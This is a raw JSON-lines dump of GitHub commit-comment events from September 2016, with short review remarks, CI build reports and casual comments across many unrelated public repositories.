{"id":"4542061047","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18968681,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-09T19:55:52Z","updated_at":"2016-09-09T19:55:52Z","body":"What?"}},"created_at":"2016-09-09T19:55:52Z"}
{"id":"4542061727","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18968683,"position":null,"line":null,"path":null,"commit_id":"029890df50d24f26fe0d939f4c97d05cf129290a","created_at":"2016-09-09T19:56:00Z","updated_at":"2016-09-09T19:56:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#H310rp2ETEKlNTN0OKqsFw"}},"created_at":"2016-09-09T19:56:00Z"}
{"id":"4542062154","type":"CommitCommentEvent","actor":{"login":"pkazenkov"},"repo":{"name":"pkazenkov/First-repo-attempt"},"payload":{"comment":{"id":18968684,"position":null,"line":null,"path":null,"commit_id":"c2bf84af392c7102b83ee25beda8b5b090a1535e","created_at":"2016-09-09T19:56:08Z","updated_at":"2016-09-09T19:56:08Z","body":"interesting. trying out commenting on first commit\r\n\r\n"}},"created_at":"2016-09-09T19:56:08Z"}
{"id":"4542062914","type":"CommitCommentEvent","actor":{"login":"abc123994"},"repo":{"name":"abc123994/colour"},"payload":{"comment":{"id":18968687,"position":null,"line":null,"path":null,"commit_id":"bc5af54ac669046838c7e7f85a52547e87df9a46","created_at":"2016-09-09T19:56:18Z","updated_at":"2016-09-09T19:56:18Z","body":"後來會出現 排名亂掉的狀況"}},"created_at":"2016-09-09T19:56:18Z"}
{"id":"4542063676","type":"CommitCommentEvent","actor":{"login":"matthiasblaesing"},"repo":{"name":"java-native-access/jna"},"payload":{"comment":{"id":18968691,"position":null,"line":null,"path":null,"commit_id":"96869bb02df9fbffab35fb115a7e0c7757cb2668","created_at":"2016-09-09T19:56:26Z","updated_at":"2016-09-09T19:56:26Z","body":"@lwahonen I'll only focus on the concrete usecase: Both suggested sources for errors here are covered:\r\n\r\n- hWnd is never invalid -- null is always a valid value and retrieves all messages for this thread\r\n- lpMsg is initialized on the java side and so can't be invalid\r\n\r\nDo you suggest a change?"}},"created_at":"2016-09-09T19:56:26Z"}
{"id":"4542064433","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":18968693,"position":null,"line":null,"path":null,"commit_id":"613c18d5c627b6dc09d9e84c5e4f24e4df5ac5a1","created_at":"2016-09-09T19:56:36Z","updated_at":"2016-09-09T19:56:36Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cuANs5h-Qs6sXiSetpIeFw"}},"created_at":"2016-09-09T19:56:36Z"}
{"id":"4542064579","type":"CommitCommentEvent","actor":{"login":"jaydenkieran"},"repo":{"name":"GetRektByMe/Pixie"},"payload":{"comment":{"id":18968694,"position":14,"line":14,"path":"pixie/utils/__init__.py","commit_id":"84b86737bcc62e93914859dde8c18f0dcbfc9dfb","created_at":"2016-09-09T19:56:38Z","updated_at":"2016-09-09T19:56:38Z","body":"mix of \" and ' triggers me"}},"created_at":"2016-09-09T19:56:38Z"}
{"id":"4542071299","type":"CommitCommentEvent","actor":{"login":"zherzl"},"repo":{"name":"zherzl/MVC.net"},"payload":{"comment":{"id":18968712,"position":null,"line":null,"path":null,"commit_id":"d14491b1a992d1acff87ab9078771bd9d8f31004","created_at":"2016-09-09T19:57:57Z","updated_at":"2016-09-09T19:57:57Z","body":"f"}},"created_at":"2016-09-09T19:57:57Z"}
{"id":"4542075341","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18968720,"position":null,"line":null,"path":null,"commit_id":"3f1e3e7d5d27f906df661e9e103aa12c1f93b8ba","created_at":"2016-09-09T19:58:50Z","updated_at":"2016-09-09T19:58:50Z","body":"Ayyy, commit 3000"}},"created_at":"2016-09-09T19:58:50Z"}
{"id":"4542076547","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18968721,"position":82,"line":66,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-09T19:59:07Z","updated_at":"2016-09-09T19:59:07Z","body":"Probably not needed for ydk-py. Any advantage of having this?"}},"created_at":"2016-09-09T19:59:07Z"}
{"id":"4542079367","type":"CommitCommentEvent","actor":{"login":"syncsynchalt"},"repo":{"name":"lierc/lierc-basicui"},"payload":{"comment":{"id":18968725,"position":null,"line":null,"path":null,"commit_id":"46b68abbf06c45f5489627c923107a475930d07a","created_at":"2016-09-09T19:59:42Z","updated_at":"2016-09-09T19:59:42Z","body":"you write truth tests like my grandmother"}},"created_at":"2016-09-09T19:59:42Z"}
{"id":"4542079957","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18968727,"position":null,"line":null,"path":null,"commit_id":"5b0b9261b4f3a1a9821f4692435e63c585392665","created_at":"2016-09-09T19:59:49Z","updated_at":"2016-09-09T19:59:49Z","body":"Thank you. \r\nSo much. "}},"created_at":"2016-09-09T19:59:49Z"}
{"id":"4537719689","type":"CommitCommentEvent","actor":{"login":"Esparses"},"repo":{"name":"Esparses/menuSlidePush"},"payload":{"comment":{"id":18956439,"position":null,"line":null,"path":null,"commit_id":"65bc785ec9e1cfb3ea0429cb42c50b63c8641794","created_at":"2016-09-09T02:01:58Z","updated_at":"2016-09-09T02:01:58Z","body":"dsdasdasd"}},"created_at":"2016-09-09T02:01:58Z"}
{"id":"4537725440","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18956443,"position":12,"line":10,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-09T02:04:05Z","updated_at":"2016-09-09T02:04:05Z","body":"This, together with `/**` in `autoClosingPairs` below allows to write doc comments easily like this:\r\n![](http://i.imgur.com/0JslYFQ.gif)"}},"created_at":"2016-09-09T02:04:05Z"}
{"id":"4537728777","type":"CommitCommentEvent","actor":{"login":"hanbit-tutor"},"repo":{"name":"hanbit-java001/tutor"},"payload":{"comment":{"id":18956447,"position":4,"line":7,"path":"src/main/java/com/hanbit/standalone/Hello.java","commit_id":"92d13fc85b1db58ebda85d4c2905a555738fb991","created_at":"2016-09-09T02:05:22Z","updated_at":"2016-09-09T02:05:22Z","body":"별론데요"}},"created_at":"2016-09-09T02:05:22Z"}
{"id":"4537731020","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18956454,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-09T02:06:10Z","updated_at":"2016-09-09T02:06:10Z","body":"I played games.\r\n"}},"created_at":"2016-09-09T02:06:10Z"}
{"id":"4537731978","type":"CommitCommentEvent","actor":{"login":"jasonbone"},"repo":{"name":"hanbit-java001/tutor"},"payload":{"comment":{"id":18956459,"position":4,"line":7,"path":"src/main/java/com/hanbit/standalone/Hello.java","commit_id":"92d13fc85b1db58ebda85d4c2905a555738fb991","created_at":"2016-09-09T02:06:30Z","updated_at":"2016-09-09T02:06:30Z","body":"별로네요"}},"created_at":"2016-09-09T02:06:30Z"}
{"id":"4537733210","type":"CommitCommentEvent","actor":{"login":"christian-marie"},"repo":{"name":"feuerbach/temporary"},"payload":{"comment":{"id":18956461,"position":3,"line":2,"path":"System/IO/Temp.hs","commit_id":"7f0d514f80921d7ef11690a412c8ff411f034d7e","created_at":"2016-09-09T02:06:58Z","updated_at":"2016-09-09T02:06:58Z","body":"inconsistent spaces"}},"created_at":"2016-09-09T02:06:58Z"}
{"id":"4537735032","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vshaxe"},"payload":{"comment":{"id":18956465,"position":22,"line":20,"path":"haxe.configuration.json","commit_id":"10c9a457a2f0b1827730c2a3eeb0a8c0711c0f2e","created_at":"2016-09-09T02:07:37Z","updated_at":"2016-09-09T02:07:37Z","body":"These settings allow wrapping selection in brackets/quotes, like this:\r\n![](http://i.imgur.com/96f30nN.gif)\r\n![](http://i.imgur.com/wjYPXnF.gif)\r\nI'm not yet sure whether this is useful or annoying, but I decided to give it a try."}},"created_at":"2016-09-09T02:07:37Z"}
{"id":"4537735484","type":"CommitCommentEvent","actor":{"login":"googlr"},"repo":{"name":"googlr/Path2Java"},"payload":{"comment":{"id":18956467,"position":null,"line":null,"path":null,"commit_id":"b9b474c87b9e863d133de146ae7a6dc64ab8064c","created_at":"2016-09-09T02:07:47Z","updated_at":"2016-09-09T02:07:47Z","body":"Q&A:\r\n\r\n>Tonys-Mac:path2java dc$ git push\r\nerror: update_ref failed for ref 'refs/remotes/origin/master': cannot lock ref 'refs/remotes/origin/master': Unable to create '/Users/dc/documents/onedrive/gitplace/path2java/.git/refs/remotes/origin/master.lock': Permission denied\r\n\r\nSolution: \r\nAcoording to the error message, git fail to write ' master.lock\" into my local repo. I put the local repo of git in my Onedrive folder. It seems that I created the local repo folder with a *sudo*. So the solution is change the permission mode of the folder and add write permission for it.\r\n> sudo chmod -R a+w OneDrive/\r\n\r\nThen it works :)\r\n\r\n\r\n"}},"created_at":"2016-09-09T02:07:47Z"}
{"id":"4537735768","type":"CommitCommentEvent","actor":{"login":"Cathyusyd"},"repo":{"name":"Cathyusyd/hello-world"},"payload":{"comment":{"id":18956468,"position":18,"line":18,"path":"JSp1_4.php","commit_id":"380e13362edc808a19e38a0e6b1b333c196c8fec","created_at":"2016-09-09T02:07:52Z","updated_at":"2016-09-09T02:07:52Z","body":"#"}},"created_at":"2016-09-09T02:07:52Z"}
{"id":"4537752024","type":"CommitCommentEvent","actor":{"login":"Nasimaxxx"},"repo":{"name":"Nasimaxxx/Nasimaxxx.github.io"},"payload":{"comment":{"id":18956509,"position":null,"line":null,"path":null,"commit_id":"e0242169091427f0fc802a8106118a648639e16b","created_at":"2016-09-09T02:13:52Z","updated_at":"2016-09-09T02:13:52Z","body":"delete"}},"created_at":"2016-09-09T02:13:52Z"}
{"id":"4537754611","type":"CommitCommentEvent","actor":{"login":"dkwingsmt"},"repo":{"name":"poooi/poi"},"payload":{"comment":{"id":18956515,"position":null,"line":null,"path":null,"commit_id":"01f64e017363f6a56e5312a987eb18c0c2dc4d11","created_at":"2016-09-09T02:14:50Z","updated_at":"2016-09-09T02:14:50Z","body":"感觉好脆弱啊，不用改到 index.html 吗"}},"created_at":"2016-09-09T02:14:50Z"}
{"id":"4537756685","type":"CommitCommentEvent","actor":{"login":"mattwwatson"},"repo":{"name":"mattwwatson/githubfun"},"payload":{"comment":{"id":18956517,"position":null,"line":null,"path":null,"commit_id":"993979b4572efc131b760960ad4b27efd29cd19d","created_at":"2016-09-09T02:15:36Z","updated_at":"2016-09-09T02:15:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Lw2q1YJ3&#x2F;2-thing-two\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> thing two</a>"}},"created_at":"2016-09-09T02:15:36Z"}
{"id":"4537757951","type":"CommitCommentEvent","actor":{"login":"mohammadrezajiji"},"repo":{"name":"mohammadrezajiji/mohammadrezajiji"},"payload":{"comment":{"id":18956523,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T02:16:04Z","updated_at":"2016-09-09T02:16:04Z","body":"267785153"}},"created_at":"2016-09-09T02:16:04Z"}
{"id":"4537759425","type":"CommitCommentEvent","actor":{"login":"mohammadrezajiji"},"repo":{"name":"mohammadrezajiji/mohammadrezajiji"},"payload":{"comment":{"id":18956530,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T02:16:36Z","updated_at":"2016-09-09T02:16:36Z","body":"267785153"}},"created_at":"2016-09-09T02:16:36Z"}
{"id":"4537759883","type":"CommitCommentEvent","actor":{"login":"tmciver"},"repo":{"name":"unisonweb/unison"},"payload":{"comment":{"id":18956531,"position":39,"line":33,"path":"node/src/Unison/Runtime/Cryptography.hs","commit_id":"8c99adb495e166b66cb6447c0465ac50da0aa6f0","created_at":"2016-09-09T02:16:46Z","updated_at":"2016-09-09T02:16:46Z","body":"Thanks for the link to the conversation.  I'll look into the references that Riastradh mentions and take a look at the libsodium library (I guess it's [saltine](https://hackage.haskell.org/package/saltine)).  Once I think I understand what needs to be done we can discuss an approach."}},"created_at":"2016-09-09T02:16:46Z"}
{"id":"4537760848","type":"CommitCommentEvent","actor":{"login":"hisRoyalRudeness"},"repo":{"name":"elarnia/_basic"},"payload":{"comment":{"id":18956536,"position":null,"line":null,"path":null,"commit_id":"252d82032e67dd144e398b60810b0691da29aae3","created_at":"2016-09-09T02:17:09Z","updated_at":"2016-09-09T02:17:09Z","body":"[rudeproj1.pdf](https://github.com/elarnia/_basic/files/463054/rudeproj1.pdf)\r\n"}},"created_at":"2016-09-09T02:17:09Z"}
{"id":"4537761370","type":"CommitCommentEvent","actor":{"login":"devfausto"},"repo":{"name":"devfausto/Fausto-Invite"},"payload":{"comment":{"id":18956539,"position":null,"line":null,"path":null,"commit_id":"cfd5dfd7f70f121cb520d000bf55559b8d3842a3","created_at":"2016-09-09T02:17:21Z","updated_at":"2016-09-09T02:17:21Z","body":"ok"}},"created_at":"2016-09-09T02:17:21Z"}
{"id":"4537761832","type":"CommitCommentEvent","actor":{"login":"mohammadrezajiji"},"repo":{"name":"mohammadrezajiji/mohammadrezajiji"},"payload":{"comment":{"id":18956540,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T02:17:31Z","updated_at":"2016-09-09T02:17:31Z","body":"267785153"}},"created_at":"2016-09-09T02:17:31Z"}
{"id":"4537765145","type":"CommitCommentEvent","actor":{"login":"raamdev"},"repo":{"name":"websharks/woocommerce-intercom-pro"},"payload":{"comment":{"id":18956547,"position":5,"line":110,"path":"src/includes/classes/Utils/JsSnippet.php","commit_id":"9ca2c6add533b8da3ba02c33dcf8a3ca8b1d8987","created_at":"2016-09-09T02:18:52Z","updated_at":"2016-09-09T02:18:52Z","body":"@jaswsinc FYI, this was fixed: https://github.com/websharks/woocommerce-intercom-pro/compare/282cb01a24b0...86f8ac436b7f"}},"created_at":"2016-09-09T02:18:52Z"}
{"id":"4537765380","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18956549,"position":null,"line":null,"path":null,"commit_id":"ae6f643b6883c70d7cd2c8d544ea46f90223a056","created_at":"2016-09-09T02:18:58Z","updated_at":"2016-09-09T02:18:58Z","body":"++"}},"created_at":"2016-09-09T02:18:58Z"}
{"id":"4537766089","type":"CommitCommentEvent","actor":{"login":"mohammadrezajiji"},"repo":{"name":"mohammadrezajiji/mohammadrezajiji"},"payload":{"comment":{"id":18956552,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T02:19:15Z","updated_at":"2016-09-09T02:19:15Z","body":"۳"}},"created_at":"2016-09-09T02:19:15Z"}
{"id":"4537767123","type":"CommitCommentEvent","actor":{"login":"mohammadrezajiji"},"repo":{"name":"mohammadrezajiji/mohammadrezajiji"},"payload":{"comment":{"id":18956555,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T02:19:38Z","updated_at":"2016-09-09T02:19:38Z","body":"."}},"created_at":"2016-09-09T02:19:38Z"}
{"id":"4537769216","type":"CommitCommentEvent","actor":{"login":"veksen"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18956560,"position":null,"line":null,"path":null,"commit_id":"4273000319dbc33236cb4b314c61efe815b8e94f","created_at":"2016-09-09T02:20:31Z","updated_at":"2016-09-09T02:20:31Z","body":"Should be, yes"}},"created_at":"2016-09-09T02:20:31Z"}
{"id":"4537770723","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/event-ts"},"payload":{"comment":{"id":18956563,"position":null,"line":null,"path":null,"commit_id":"af8f4c7838a2f98de76aaa9eddadf760aa5ab914","created_at":"2016-09-09T02:21:08Z","updated_at":"2016-09-09T02:21:08Z","body":"#1 "}},"created_at":"2016-09-09T02:21:08Z"}
{"id":"4537770830","type":"CommitCommentEvent","actor":{"login":"mohammadrezajiji"},"repo":{"name":"mohammadrezajiji/mohammadrezajiji"},"payload":{"comment":{"id":18956564,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T02:21:10Z","updated_at":"2016-09-09T02:21:10Z","body":"267785153"}},"created_at":"2016-09-09T02:21:10Z"}
{"id":"4537771455","type":"CommitCommentEvent","actor":{"login":"mohammadrezajiji"},"repo":{"name":"mohammadrezajiji/mohammadrezajiji"},"payload":{"comment":{"id":18956565,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-09T02:21:24Z","updated_at":"2016-09-09T02:21:24Z","body":"267785153"}},"created_at":"2016-09-09T02:21:24Z"}
{"id":"4537772442","type":"CommitCommentEvent","actor":{"login":"jaswsinc"},"repo":{"name":"websharks/woocommerce-intercom-pro"},"payload":{"comment":{"id":18956570,"position":5,"line":110,"path":"src/includes/classes/Utils/JsSnippet.php","commit_id":"9ca2c6add533b8da3ba02c33dcf8a3ca8b1d8987","created_at":"2016-09-09T02:21:50Z","updated_at":"2016-09-09T02:21:50Z","body":"Cool. Love the use of `sprintf()` there. Nice!"}},"created_at":"2016-09-09T02:21:50Z"}
{"id":"4537773148","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/event-ts"},"payload":{"comment":{"id":18956574,"position":null,"line":null,"path":null,"commit_id":"e32405027062076810a1193f62f60778b49fa34e","created_at":"2016-09-09T02:22:06Z","updated_at":"2016-09-09T02:22:06Z","body":"#1 "}},"created_at":"2016-09-09T02:22:06Z"}
{"id":"4537773718","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/event-ts"},"payload":{"comment":{"id":18956575,"position":null,"line":null,"path":null,"commit_id":"4af971a38e9e335417e726a7fef1f1f73578ee7d","created_at":"2016-09-09T02:22:18Z","updated_at":"2016-09-09T02:22:18Z","body":"#1 "}},"created_at":"2016-09-09T02:22:18Z"}
{"id":"4537775880","type":"CommitCommentEvent","actor":{"login":"maxtherabbit"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18956579,"position":null,"line":null,"path":null,"commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T02:23:11Z","updated_at":"2016-09-09T02:23:11Z","body":"maybe just add a third argument to UpdateEnmity that is explicitly 0 when called from UPdateEnmityFromCure but defaults to 1 which controls writing to high pc level?"}},"created_at":"2016-09-09T02:23:11Z"}
{"id":"4537777546","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18956581,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-09T02:23:51Z","updated_at":"2016-09-09T02:23:51Z","body":"develop (Unknown) - i386-Windows-7-VisualStudio-12: OK (2401 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.08%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T02:23:51Z"}
{"id":"4537779191","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/feng3d-ts"},"payload":{"comment":{"id":18956583,"position":null,"line":null,"path":null,"commit_id":"0f1e978a8c194feca1039be9f74cacf7af8e50d9","created_at":"2016-09-09T02:24:31Z","updated_at":"2016-09-09T02:24:31Z","body":"#4 "}},"created_at":"2016-09-09T02:24:31Z"}
{"id":"4537779197","type":"CommitCommentEvent","actor":{"login":"topdoublestroller"},"repo":{"name":"babel/babylon"},"payload":{"comment":{"id":18956584,"position":null,"line":null,"path":null,"commit_id":"406cd33ca21c8b90ffff735c1d3fc742ca72165a","created_at":"2016-09-09T02:24:31Z","updated_at":"2016-09-09T02:24:31Z","body":"I do not understand what you're writing. and no useful info for [my website](http://topdoublestrollers.net/)"}},"created_at":"2016-09-09T02:24:31Z"}
{"id":"4537779952","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18956587,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-09T02:24:50Z","updated_at":"2016-09-09T02:24:50Z","body":"input_processor_refactor (pshires) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1782 of 1784 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.89%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.98%25-green.svg)</a>\n"}},"created_at":"2016-09-09T02:24:50Z"}
{"id":"4537780301","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/feng3d-ts"},"payload":{"comment":{"id":18956589,"position":null,"line":null,"path":null,"commit_id":"4296b8db94ac6f3ba5a6a183001b4e621b148526","created_at":"2016-09-09T02:24:58Z","updated_at":"2016-09-09T02:24:58Z","body":"#4 "}},"created_at":"2016-09-09T02:24:58Z"}
{"id":"4537780932","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/feng3d-ts"},"payload":{"comment":{"id":18956591,"position":null,"line":null,"path":null,"commit_id":"05316eb6afe42b42eb591607e74f704d2d0f51f3","created_at":"2016-09-09T02:25:13Z","updated_at":"2016-09-09T02:25:13Z","body":"#4 "}},"created_at":"2016-09-09T02:25:13Z"}
{"id":"4537792223","type":"CommitCommentEvent","actor":{"login":"snare"},"repo":{"name":"snare/voltron"},"payload":{"comment":{"id":18956626,"position":null,"line":null,"path":null,"commit_id":"ef27410896b872397d3cf7525b495ca477f710b0","created_at":"2016-09-09T02:29:41Z","updated_at":"2016-09-09T02:29:41Z","body":"Thanks!"}},"created_at":"2016-09-09T02:29:41Z"}
{"id":"4537793412","type":"CommitCommentEvent","actor":{"login":"mallikarjuna-sangisetty"},"repo":{"name":"mallikarjuna-sangisetty/BankingAppWithRest"},"payload":{"comment":{"id":18956634,"position":5,"line":79,"path":"src/main/java/com/rest/controller/RestController.java","commit_id":"2192b6c2557850876950a07f266b09de5805034f","created_at":"2016-09-09T02:30:09Z","updated_at":"2016-09-09T02:30:09Z","body":"following ... "}},"created_at":"2016-09-09T02:30:09Z"}
{"id":"4537796444","type":"CommitCommentEvent","actor":{"login":"houkanshan"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18956646,"position":null,"line":null,"path":null,"commit_id":"b55fd328c79158a5f4f5f2b432a129f3e4cff0c2","created_at":"2016-09-09T02:31:17Z","updated_at":"2016-09-09T02:31:17Z","body":"这里需要有一些具体的限制吧。比如是不能打开仓盖"}},"created_at":"2016-09-09T02:31:17Z"}
{"id":"4537796554","type":"CommitCommentEvent","actor":{"login":"DavidGentric"},"repo":{"name":"DavidGentric/delphi"},"payload":{"comment":{"id":18956647,"position":null,"line":null,"path":null,"commit_id":"96ae4e247567cd669ff4948f533be3df07181cbb","created_at":"2016-09-09T02:31:19Z","updated_at":"2016-09-09T02:31:19Z","body":"app Fonctionnel"}},"created_at":"2016-09-09T02:31:19Z"}
{"id":"4537798795","type":"CommitCommentEvent","actor":{"login":"tylers-dev"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":18956651,"position":null,"line":null,"path":null,"commit_id":"47e5948d1bc0e99cf26efe99f71145359adeadf4","created_at":"2016-09-09T02:32:14Z","updated_at":"2016-09-09T02:32:14Z","body":"Now that Apex has thermal resistant clothing why are we still making thermal items harder to get? Everyone wears the full ghillie and it has almost no thermal signature."}},"created_at":"2016-09-09T02:32:14Z"}
{"id":"4537800004","type":"CommitCommentEvent","actor":{"login":"emv0211"},"repo":{"name":"emv0211/webprog"},"payload":{"comment":{"id":18956656,"position":null,"line":null,"path":null,"commit_id":"23bac04630c504a9da9200dc6f8dc2e0b7a1ed6e","created_at":"2016-09-09T02:32:39Z","updated_at":"2016-09-09T02:32:39Z","body":"![acousticguitar](https://cloud.githubusercontent.com/assets/22088972/18373655/1d06e4e4-7614-11e6-9eb8-086f1ff033a8.jpg)\r\n"}},"created_at":"2016-09-09T02:32:39Z"}
{"id":"4537822995","type":"CommitCommentEvent","actor":{"login":"manradhaCisco"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18956697,"position":null,"line":null,"path":null,"commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T02:40:49Z","updated_at":"2016-09-09T02:40:49Z","body":"First commit of the validation service (lacks enum,bits, decimal 64 test cases)"}},"created_at":"2016-09-09T02:40:49Z"}
{"id":"4537825629","type":"CommitCommentEvent","actor":{"login":"a240277805"},"repo":{"name":"a240277805/WPF"},"payload":{"comment":{"id":18956705,"position":null,"line":null,"path":null,"commit_id":"3e6c551117ac0ca2174842f79b7ab8aee8a8fae7","created_at":"2016-09-09T02:41:49Z","updated_at":"2016-09-09T02:41:49Z","body":"my WPF Practise Demos"}},"created_at":"2016-09-09T02:41:49Z"}
{"id":"4537825630","type":"CommitCommentEvent","actor":{"login":"Villa41"},"repo":{"name":"Villa41/Prueba"},"payload":{"comment":{"id":18956706,"position":6,"line":4,"path":"README.md","commit_id":"f930acaa5e43307e297f51461fa9a5f0b273b731","created_at":"2016-09-09T02:41:49Z","updated_at":"2016-09-09T02:41:49Z","body":"Sugiero emepezar con mayuscula"}},"created_at":"2016-09-09T02:41:49Z"}
{"id":"4537826421","type":"CommitCommentEvent","actor":{"login":"kejuntong"},"repo":{"name":"TianqiYu/hello-world"},"payload":{"comment":{"id":18956714,"position":null,"line":null,"path":null,"commit_id":"e190528771a6163934cf8e6683ce154cad0d8b99","created_at":"2016-09-09T02:42:08Z","updated_at":"2016-09-09T02:42:08Z","body":"I don't love apple juice."}},"created_at":"2016-09-09T02:42:08Z"}
{"id":"4537827604","type":"CommitCommentEvent","actor":{"login":"swhp"},"repo":{"name":"NanoDesuTranslations/editor"},"payload":{"comment":{"id":18956722,"position":null,"line":null,"path":null,"commit_id":"f466994fb12dd2460c3434ad6e5f77c1bbc529c8","created_at":"2016-09-09T02:42:33Z","updated_at":"2016-09-09T02:42:33Z","body":"@DerekRS Sorry since I'm not test that very well it give us some error, So I already make change in this [commit](https://github.com/NanoDesuTranslations/editor/commit/864758ac0cd8db6fb1a624def2368ca053739fa6) Still don't know why comment directives and class directive not working. I'm just following in [here](https://docs.angularjs.org/guide/production)"}},"created_at":"2016-09-09T02:42:33Z"}
{"id":"4537829517","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"zyedidia/micro"},"payload":{"comment":{"id":18956727,"position":null,"line":null,"path":null,"commit_id":"ed31d37e7413f299748105a3ad93a4273a73b496","created_at":"2016-09-09T02:43:15Z","updated_at":"2016-09-09T02:43:15Z","body":"Looks like a lot of repeated code `if !PreActionCall(\"NextSplit\") {`. Is it possible that action is not called directly, but through some \"ActionQueue\", which can actually handle this?"}},"created_at":"2016-09-09T02:43:15Z"}
{"id":"4537832408","type":"CommitCommentEvent","actor":{"login":"Villa41"},"repo":{"name":"Villa41/Prueba"},"payload":{"comment":{"id":18956737,"position":null,"line":null,"path":null,"commit_id":"f930acaa5e43307e297f51461fa9a5f0b273b731","created_at":"2016-09-09T02:44:20Z","updated_at":"2016-09-09T02:44:20Z","body":"Creo que hay un error"}},"created_at":"2016-09-09T02:44:20Z"}
